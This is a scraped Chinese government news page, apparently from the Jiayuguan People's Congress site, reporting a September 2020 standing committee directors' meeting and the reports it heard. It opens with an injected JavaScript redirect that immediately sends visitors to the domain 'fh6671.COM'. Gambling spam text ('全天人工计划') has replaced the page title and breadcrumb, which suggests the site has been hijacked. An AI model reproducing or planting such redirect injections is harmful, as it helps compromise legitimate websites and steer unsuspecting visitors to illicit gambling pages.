function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新工作动态  >>  会议专栏  >>  主任会议  
市十届人大常委会第49次主任会议召开
来源: 嘉峪关日报      日期: 2020-09-10      作者: 李霞      点击数:

市十届人大常委会第49次主任会议召开

王进平主持

       嘉峪关日报讯(记者李霞)9月9日,市十届人大常委会第49次主任会议召开。市人大常委会主任王进平主持会议。市人大常委会副主任王万平、唐晓东、韩峻峰、荔瑾出席。

       会上听取了关于2019年度行政事业性国有资产管理情况的调研报告;听取关于对市民政局、市生态环境局工作评议调查报告;听取《关于<嘉峪关市市容和环境卫生管理条例>执法检查报告》;听取关于《嘉峪关市中心城区酒钢工业片区控制性详细规划》备案审查过程的说明;听取《嘉峪关市人民代表大会常务委员会关于加强公益诉讼的决定(二审稿)》的修改说明;听取《关于发挥审判职能、检察职能为民营经济健康发展营造法治化营商环境、保障和促进民营经济健康发展调研报告》;听取《关于<嘉峪关市人民代表大会常务委员会人事任免办法>的修订说明》;听取有关人事任免事宜;听取市十届人大常委会第二十九次会议议程草案和日程安排;听取《关于市政府2019年度市级预算执行和其他财政收支情况审计工作报告的审查意见(审议稿)》;听取《关于<嘉峪关市养犬管理条例(草案)>专业审查情况的报告》。

       市人大各专委会、常委会各部门负责人列席会议。